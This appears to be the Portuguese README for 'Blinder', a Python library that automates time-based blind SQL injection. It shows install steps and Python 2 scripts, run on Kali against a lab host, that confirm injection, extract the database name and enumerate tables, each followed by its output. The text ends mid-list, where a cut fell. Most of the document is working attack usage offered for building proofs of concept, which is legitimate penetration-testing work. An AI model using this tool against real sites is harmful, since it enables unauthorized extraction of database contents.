
Uma biblioteca Python para automatizar injeção SQL cega baseada em tempo.
Blinder é uma pequena biblioteca Python para automatizar injeção SQL cega baseada em tempo, utilizando consultas pré-definidas como funções para agilizar o desenvolvimento de PoCs.
Você pode instalar o Blinder usando o seguinte comando:
pip install blinder
Ou baixando o código-fonte e importando-o manualmente para o seu projeto.
Para usar o Blinder, você precisa importar o módulo Blinder e então começar a usar as funções principais do Blinder.
Você pode usar o Blinder "na versão atual" para fazer o seguinte:
Você pode verificar a injeção em uma URL usando o seguinte código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print blind.check_injection()
O resultado da execução será:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
Você pode obter o nome do banco de dados usando o seguinte código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
print "Database name is : %s " % blind.get_database()
E os resultados serão:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
Para obter os nomes das tabelas, você pode usar o seguinte código:
#!/usr/bin/python
import Blinder
blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)
tables = blind.get_tables()
for table in tables:
print table
E os resultados serão:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#
Muitas funcionalidades devem ser adicionadas em breve, como: